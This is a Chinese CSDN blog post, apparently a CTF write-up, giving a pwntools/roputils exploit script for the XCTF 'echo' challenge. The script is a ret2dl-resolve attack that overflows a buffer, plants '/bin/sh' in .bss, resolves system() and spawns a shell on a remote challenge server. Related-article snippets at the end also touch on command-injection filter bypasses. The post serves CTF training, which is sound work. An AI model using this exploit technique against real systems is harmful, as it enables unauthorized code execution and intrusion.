2019XCTF攻防世界之萌新入坑(echo)

最新推荐文章于 2024-05-21 12:35:22 发布
最新推荐文章于 2024-05-21 12:35:22 发布
阅读量538 收藏 1
点赞数 1
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44113469/article/details/89508459
版权

ret2resolve

exp

import sys
import roputils
from pwn import *

context.log_level = 'debug'
#r = process("./pwn")
p = remote("111.198.29.45",37888)

rop = roputils.ROP('./echo')
addr_bss = rop.section('.bss')

offset = 0x3e
buf = rop.retfill(offset)
buf += rop.call('gets',addr_bss)#这里addr_bss是gets函数的参数
buf += rop.dl_resolve_call(addr_bss+20, addr_bss)#20是伪造栈的长度

p.sendline(buf)
buf = rop.string('/bin/sh')
buf += rop.fill(20, buf)
buf += rop.dl_resolve_data(addr_bss+20, 'system')
buf += rop.fill(100, buf)
p.recvuntil("\n")
p.sendline(buf)
p.interactive()

 

梦回Altay
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF-ECHO-200格式化字符串漏洞+shellcode
BadRer的博客
06-01 2282
很开心有成功做了一道格式化字符串,这题我也不清楚是哪次比赛上的,漏洞还是十分的明显,格式化加个shellcode直接搞定。就是这算的比较麻烦一点。 那么直接进入正题咯! 开干!! 首先拿checksec检查一遍(个人习惯哈) 可以看到,开了栈保护,但是NX disabled,说明堆栈可执行,直接上shellcode,也没有PIE。 先试试水。 应该有格式化漏洞。 IDA反汇
攻防世界逆向高手题之echo-server
沐一 · 林 的博客
10-25 691
攻防世界逆向高手题之echo-server 继续开启全栈梦想之逆向之旅~ 这题是攻防世界逆向高手题的handcrafted-pyc . . 下载附件,照例扔入exeinfope中查看信息: . . 32位ELF文件无壳,照例运行下一程序,查看主要回显信息。但是如上图一样,我的是Kali,所以有报错libcrypto.so.1.0.0缺失,但是我没有ubuntu,所以我只能结合别人的资料静态直接分析了: . . 照例扔入32位IDA中分析伪代码,有main函数看main函数: 因为前面修改后调
攻防世界】MISC - low
最新发布
JACKBREAK的博客
05-21 354
攻防世界-CTF-MISC,解题日常
攻防世界_echo-server
呱呱呱
12-01 225
攻防世界_echo-server,通过去除花指令,找到密钥,得到flag
XCTF-攻防世界CTF平台-Reverse逆向类——54、echo-server(Linux32位ELF文件、花指令混淆反汇编)
Onlyone_1314的博客
10-30 1044
目录标题第一个花指令混淆080487C1:第二个花指令混淆080487F3:第三个花指令混淆08048816:第四个花指令混淆08048859:修改程序跳转逻辑方法1:方法2:题外话:   下载附件,查看信息:   是Linux下的32位ELF文件,运行程序:   发现是一个输入字符串,将字符串中的每个字符转换成对应的ASCII码输出的程序   用IDA打开,先查看字符串窗口:   有一些用到的字符串:   “Echo Server 0.3 ALPHA”这个在我们上面运行程序的时候见过了:   就
inc si指令的作用_LLVM中的指令映射
weixin_39559079的博客
11-20 410
原创内容,转载请注明出处。作者:汪岩1. 什么是指令映射本文介绍LLVM中的指令映射机制,以及AMDGPU backend如何为目标平台实现指令映射。本文中的指令映射不是指令选择过程中将IR指令匹配到td文件定义的机器指令,那应该称为指令匹配,匹配操作的中间媒介是MatcherTable。本文介绍的指令映射其目的是为了支持在不同的优化中切换不同指令格式,例如支持硬件架构演进过程中不同版本的ISA,...
XCTF攻防世界web.doc
09-19
【XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
【XCTF-RE】新手练习区-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
【XCTF-RE】新手练习区-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
【XCTF-RE】新手练习区-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
xctf攻防世界——hacknote
05-09 316
32位程序,未开PIE  #use after free #system("xxxx||sh") 程序逻辑 1 void __cdecl __noreturn main() 2 { 3 int choice; // eax 4 char buf; // [esp+8h] [ebp-10h] 5 unsigned int v2; // [esp+...
攻防世界(pwn)echo_back writeup
xidoo1234的博客
04-10 594
直入主题
CTF-Pwn echo_back(文件IO指针利用+格式化字符串漏洞)
SuperGate的博客
12-19 1108
程序综述 supergate@ubuntu:~/Desktop/Pwn$ checksec echo_back [*] '/home/supergate/Desktop/Pwn/echo_back' Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX e...
攻防世界萌新入门(1)
weixin_44319142的博客
04-07 2472
cgpwn2 首先查看一下 开心的萌新题目,只开了nx嘻嘻嘻嘻嘻嘻嘻 只有hello()函数需要看看 程序里边儿就有system函数可以直接调用哈哈哈哈 不过没有“/bin/sh”的字符串,所以要写进去,要写到bss,怎么写呢,我记得原来只用过read,这里有fgets,点进去看到name是一个全局变量,在bss 利用这个把/bin/sh写进去,然后,利用gets函数覆盖返回地址到syst...
XCTF echo-server
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
03-05 1228
此题是XCTF 3rd-NJCTF-2017的题目 今天做攻防世界的逆向题目的时候遇到了,就在此写下解题过程 在此附上题目下载地址 echo-serverr 1.查壳 使用ExeinfoPe工具查壳,可以发现是32位程序,没有壳 2.使用IDA进行反编译 使用32位的IDA打开程序 3.分析程序 题目提示"输入密钥,得到flag." 定位到main函数,并使用F5大法查看伪代码 这个程序的ma...
攻防世界_pwn_CGfsb(萌新版)-pwnme解惑
TedLau的博客
02-24 519
首发于鄙人博客:传送门 0x00 前言 格式化字符串漏洞。 file checksec结果如下所示: NX打开,就是说堆栈不可执行。 PIE未打开,也就是说,我们在ida中国所看到的就是函数地址在运行过程中的地址。 0x10 步骤 0x11 main函数 在main函数中,我们可以发现printf函数的用法与我们平时使用C语言的习惯不同,这样的用法会给系统...
2017_NJCTF_reverse_echo_server
ACdream
03-18 668
2017 NJCTF reverse
CTF—命令执行总结
qq_45927819的博客
11-13 3850
文章目录前言空格绕过命令分割符关键词过滤编码绕过 前言 最近遇到了好多命令执行的web题,这就来总结一下这方面的知识!! 空格绕过 常见的绕过符号有: $IFS$9 、${IFS} 、%09(php环境下)、 重定向符<>、> $IFS在linux下表示分隔符,如果不加{}则bash会将IFS解释为一个变量名, 加一个{}就固定了变量名,$IFS$9后面之所以加个$是为了起到截断的作用 ;为什么要用$9呢,因为$9只是当前系统shell进程的第九个参数的持有者,它始终为空字符串。 不仅 $
攻防世界序列化漏洞详解与利用
"攻防世界序列化问题详解" 在网络安全领域,尤其是CTF(Capture The Flag)挑战中,序列化和反序列化是常见的漏洞利用点。本篇内容主要聚焦于攻防世界平台中涉及的序列化问题,通过一道具体的题目来深入解析这一...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值